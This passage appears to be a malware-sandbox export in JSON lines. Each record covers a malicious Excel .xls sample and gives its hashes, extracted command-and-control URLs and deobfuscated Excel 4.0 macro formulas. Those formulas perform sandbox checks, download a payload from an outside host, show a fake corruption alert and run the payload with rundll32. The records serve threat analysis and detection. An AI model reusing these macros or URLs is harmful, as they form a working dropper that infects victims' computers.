corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FcvZaDJ8Vz\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0ef20b56b5de147903a8541aeeec25e22acc295f3cb7ea59d0e313eda4a8dae4"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0ef20b56b5de147903a8541aeeec25e22acc295f3cb7ea59d0e313eda4a8dae4","filesize":214016,"md5":"efee71d1406fd3a5de6fe444944db8df","sha1":"10aba1a4284a9ec6eb37c8c2ed36ffe5baddf764","sha256":"0ef20b56b5de147903a8541aeeec25e22acc295f3cb7ea59d0e313eda4a8dae4","sha512":"81a30df69262fc071d8f367a7de8a0c5e1377ce27bf72fa19b2e97ed95c8a6e82f7ba701d7053f0c957f0f73502662d57effecb41dd9b216f680d5f8f545a7e7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0ef20b56b5de147903a8541aeeec25e22acc295f3cb7ea59d0e313eda4a8dae4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"q2wzzHx2Gg\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0ef9ba966074be3b356f51b89df07a7b7345b694dfdf9f68b0009615d5ce28fd"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0ef9ba966074be3b356f51b89df07a7b7345b694dfdf9f68b0009615d5ce28fd","filesize":214016,"md5":"05f0733ab9c8d500e5c8b728b73a359f","sha1":"267a6da880b87fbb3c74e8ef84f469d6795f450c","sha256":"0ef9ba966074be3b356f51b89df07a7b7345b694dfdf9f68b0009615d5ce28fd","sha512":"458d6b15953ffda2e3e589962ffc748d12dd6a1c37e6261af3c2bc954793655d5e231e3390ab43984be7daafa0e6fb1e0d57471ca027ccb704c98037dd1a6829","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0ef9ba966074be3b356f51b89df07a7b7345b694dfdf9f68b0009615d5ce28fd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tBtNRCydwb\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f124f768c33525241c93740d1fee8123522122047c0f01acbbbf1e45caecead"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f124f768c33525241c93740d1fee8123522122047c0f01acbbbf1e45caecead","filesize":147968,"md5":"2176903a31722a986bbcce7b8c06237d","sha1":"1c5f4f17ed0f7695bae6932b1827c595afa7b636","sha256":"0f124f768c33525241c93740d1fee8123522122047c0f01acbbbf1e45caecead","sha512":"2f6a2187858038f8396142f1677af3fa2eda2b9d8d1f0e91240641586766eb2d2b6fffbc1087841a1f0e4450c4aaac333c613641d50a54cca4c029265b2a18f6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f124f768c33525241c93740d1fee8123522122047c0f01acbbbf1e45caecead.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"DjkuU5gtEX\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f1905caad061b39b80a9b938fb5ab50cc8907e5f33a01693ede064b07e704a8"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f1905caad061b39b80a9b938fb5ab50cc8907e5f33a01693ede064b07e704a8","filesize":167936,"md5":"ace8d8494787391ce91fa8b51b4676da","sha1":"af956f0b5c76035f26567a46423a91f94da0bc9d","sha256":"0f1905caad061b39b80a9b938fb5ab50cc8907e5f33a01693ede064b07e704a8","sha512":"4f1c887e83312cbcefa42cef2d609e3699f283ba1d30c75a7ef5153cd1efb1e15138f8458a885afd529e9913daa9159b40bbeea20770cc6c5bf0e122d053a85b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f1905caad061b39b80a9b938fb5ab50cc8907e5f33a01693ede064b07e704a8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CKCa7SHXHH\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f228654cb882d9f3f07058ef3c3d126c32c23d9b3bbb7b6227b56931693cdb0"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f228654cb882d9f3f07058ef3c3d126c32c23d9b3bbb7b6227b56931693cdb0","filesize":132608,"md5":"2a6f2a1492d5c5d60f9d31c1a201a997","sha1":"2e87cb2d6539d8b9ae6ccc05bf5ffc2aaf388d51","sha256":"0f228654cb882d9f3f07058ef3c3d126c32c23d9b3bbb7b6227b56931693cdb0","sha512":"1c2f438016769e1ea18051be07244daf2454a5a0e10ae2976f521562975aff31251213f4de304df73d7c33b3df58a3a5a265eb4977ad12b33581158d5c2f450e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f228654cb882d9f3f07058ef3c3d126c32c23d9b3bbb7b6227b56931693cdb0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"plzjeyEnbI\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f24245c4e86ffa1ece5b36189cbf0f724359c0f75b36cdf7034b0d3d4def9d8"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f24245c4e86ffa1ece5b36189cbf0f724359c0f75b36cdf7034b0d3d4def9d8","filesize":168960,"md5":"ddacc26c80bb43a2e7e871bf58dc08ec","sha1":"b3670572c28dd7b7a071f8eb9c5ba4fa554d3c62","sha256":"0f24245c4e86ffa1ece5b36189cbf0f724359c0f75b36cdf7034b0d3d4def9d8","sha512":"b2a3ed467840b4e32ddc22708cbf0e876c5ebe941f36bc168d0cded8888ed67f631bef7a6f36ddbfdeded39c52ced9895ec725563a893ae3edc18d580f75ae80","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f24245c4e86ffa1ece5b36189cbf0f724359c0f75b36cdf7034b0d3d4def9d8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vdUVh1J6b4\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f249a86e329e479843065229ed925c0ddc8692428d1f38bb25b40727bb886bf"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f249a86e329e479843065229ed925c0ddc8692428d1f38bb25b40727bb886bf","filesize":167936,"md5":"d8bd326546a6bc76f1d9b1c7a66c3e9b","sha1":"7a5725ebaf0adcdc225c3bf908a09d69a9b967de","sha256":"0f249a86e329e479843065229ed925c0ddc8692428d1f38bb25b40727bb886bf","sha512":"890946af9ff6d49f115cdd383d3551851b258676bbf6fc40b69e9427e06850ba3fc091ec71ccdc31da60ecca3a8cef86c488f2a68e92c3ae6ada6ab968064d18","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f249a86e329e479843065229ed925c0ddc8692428d1f38bb25b40727bb886bf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jwxerZGImU\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f3969518ab1295b8f9d86db6ebdb2e720f7685838f5c89c28b8f5a500647816"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f3969518ab1295b8f9d86db6ebdb2e720f7685838f5c89c28b8f5a500647816","filesize":152576,"md5":"53be0e2eff44a85001c1d1f5a18fe077","sha1":"405fe1f7c02c9af98a5ffa1c525a9c2fe3e96b9e","sha256":"0f3969518ab1295b8f9d86db6ebdb2e720f7685838f5c89c28b8f5a500647816","sha512":"701bc0039dc19da88fb8dc497e3b25a9b907c3196e612e72a2c689e327666d4507550a04394b7fb7acbb8dd9532a68bbe6733abf988f01960a2792f73781bd32","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f3969518ab1295b8f9d86db6ebdb2e720f7685838f5c89c28b8f5a500647816.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kRMmXzRPgV\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f3eab30ca5f1fdc4b53106867ff151fc654b904250d91371629931606efc3b4"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f3eab30ca5f1fdc4b53106867ff151fc654b904250d91371629931606efc3b4","filesize":160768,"md5":"ecef187ac8771264facd392fba9a1be6","sha1":"e333bd159e5d2eb353d848d576792d9a1f270423","sha256":"0f3eab30ca5f1fdc4b53106867ff151fc654b904250d91371629931606efc3b4","sha512":"b26b7120c1cfecfbdc6646e1052c6e324b9bc10b02ae40f1abbc3b22be9b989efe4cc88564d91879ffe0debf0a42b8a528bbfe6ea0077cb2b80676bd51c8795e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f3eab30ca5f1fdc4b53106867ff151fc654b904250d91371629931606efc3b4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UUuNtCkGbx\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f407d413082f4c5bf4aa84973b3d321fd1c1f05f5dbcddc13b98b36acd81e03"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f407d413082f4c5bf4aa84973b3d321fd1c1f05f5dbcddc13b98b36acd81e03","filesize":167936,"md5":"e02991290b97c946f5ef3919cb66744e","sha1":"9d0206fcb620f26b25325db6d2b34b48086a3f4a","sha256":"0f407d413082f4c5bf4aa84973b3d321fd1c1f05f5dbcddc13b98b36acd81e03","sha512":"a69b1ef0a70ce9124d391acde9aec80c6056a251aae64c82504dc9de0fce3d8889956d42937093521057d684af64be6b8ea6e8f1ed400ac71ea3c2a1960281c4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f407d413082f4c5bf4aa84973b3d321fd1c1f05f5dbcddc13b98b36acd81e03.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Jj1gTTGt9k\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f483de59e086600051051c55d89e3f351f4fbbbc051cacf7481b4209a1d5e25"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f483de59e086600051051c55d89e3f351f4fbbbc051cacf7481b4209a1d5e25","filesize":212992,"md5":"3fa3124ea35f63a498ee3a751fdd488f","sha1":"c5e7cb5364793987bbf1cbbb2e01923cef00fc42","sha256":"0f483de59e086600051051c55d89e3f351f4fbbbc051cacf7481b4209a1d5e25","sha512":"fe2de4bace038ccc0ad20a93f4e067fa2c3af1d3b75f910aba76378eb44b0c910109c9f2ad3a960b5faf0e46923c9d39728cda68e81a49d48452d5b057ac9223","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f483de59e086600051051c55d89e3f351f4fbbbc051cacf7481b4209a1d5e25.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AN1nUXP6CF\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f4de5d39c7296d8c10dbff4b77d3c9ec89460406ca1b19a3b54a85b39f7bd31"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f4de5d39c7296d8c10dbff4b77d3c9ec89460406ca1b19a3b54a85b39f7bd31","filesize":185344,"md5":"0385098e6a25c570fa80dc1b71a336b2","sha1":"4ab0d16256f975542f62e1e0390f4432bbee26aa","sha256":"0f4de5d39c7296d8c10dbff4b77d3c9ec89460406ca1b19a3b54a85b39f7bd31","sha512":"b0f5a36bf8ef0d0145170468208b5a4873bdb45f67001cb01e4451c18eff43250b4198674b641b95157373260127cc260786e551aa3cbbcada61c7b9232a5104","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f4de5d39c7296d8c10dbff4b77d3c9ec89460406ca1b19a3b54a85b39f7bd31.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f58ae3ba50efb3c2de01de3ff727b65c25e285d05f9f25b250d8fcc6b8ee8e3"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f58ae3ba50efb3c2de01de3ff727b65c25e285d05f9f25b250d8fcc6b8ee8e3","filesize":116224,"md5":"1219548ca55251b2c2e283a15c1ad7a4","sha1":"16eff3019c1fe7c6bb6e0db8274e2538f63538fb","sha256":"0f58ae3ba50efb3c2de01de3ff727b65c25e285d05f9f25b250d8fcc6b8ee8e3","sha512":"62f04510a160310d9470c434dab4db425eb5a5878cc762a5f882e7b95d41c766cbb16be2b610c962907efd96bcaa4d8187cf4ca6b342432118c14e6ab24067c9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f58ae3ba50efb3c2de01de3ff727b65c25e285d05f9f25b250d8fcc6b8ee8e3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EysrIhYEC5\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f636c34d9ef615dc5c5188f0b52c31105723f742dcd9a1777aa3921f62e0e91"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f636c34d9ef615dc5c5188f0b52c31105723f742dcd9a1777aa3921f62e0e91","filesize":160768,"md5":"063f93b86b25feba66df42ba6fce2e68","sha1":"9e5bc42b4c2a92290ece60ac3f2aa58585e3e4b7","sha256":"0f636c34d9ef615dc5c5188f0b52c31105723f742dcd9a1777aa3921f62e0e91","sha512":"89a46cbbf4fd56418415d8de4a6beacb94bb0245d9177fc14895a6f7cab63cf05281c2033edd7862de5adabc63d47847a731d223349343d58b3e8055f078803b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f636c34d9ef615dc5c5188f0b52c31105723f742dcd9a1777aa3921f62e0e91.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xT0rdsGKC7\",TRUE)\nGOTO(R$0C$11)"}}}]}
